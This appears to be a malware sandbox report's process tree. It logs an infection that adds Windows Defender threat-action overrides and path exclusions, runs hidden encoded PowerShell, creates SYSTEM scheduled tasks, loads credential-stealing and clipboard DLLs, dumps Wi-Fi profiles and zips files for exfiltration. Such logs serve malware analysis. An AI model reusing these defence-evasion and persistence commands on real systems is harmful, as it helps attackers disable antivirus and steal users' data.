\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VsVHNYITDnqCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VsVHNYITDnqCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhQqVpMUuwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhQqVpMUuwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lwqGFNNkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lwqGFNNkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ooaqkSSxqGyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ooaqkSSxqGyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\rNTGojywzibeDzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\rNTGojywzibeDzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UywZTyHRJKzuMACaH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UywZTyHRJKzuMACaH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TvSdAjXLYNsucLRI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TvSdAjXLYNsucLRI\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VsVHNYITDnqCC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VsVHNYITDnqCC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VsVHNYITDnqCC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhQqVpMUuwUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhQqVpMUuwUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\beIflBxZQdcSoxIZQvR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\beIflBxZQdcSoxIZQvR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lwqGFNNkU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lwqGFNNkU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ooaqkSSxqGyU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ooaqkSSxqGyU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\rNTGojywzibeDzVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\rNTGojywzibeDzVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UywZTyHRJKzuMACaH /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UywZTyHRJKzuMACaH /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TvSdAjXLYNsucLRI /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TvSdAjXLYNsucLRI /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giwLzijOo" /SC once /ST 09:55:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giwLzijOo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giwLzijOo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ltbOwrqBWDKUbrYld" /SC once /ST 16:18:48 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TvSdAjXLYNsucLRI\RBXcSiIzygvFYlc\sxyrbzs.exe\" xj /YmYQdidNG 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ltbOwrqBWDKUbrYld"2⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\571316656366_Desktop.zip' -CompressionLevel Optimal4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\Temp\TvSdAjXLYNsucLRI\RBXcSiIzygvFYlc\sxyrbzs.exeC:\Windows\Temp\TvSdAjXLYNsucLRI\RBXcSiIzygvFYlc\sxyrbzs.exe xj /YmYQdidNG 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
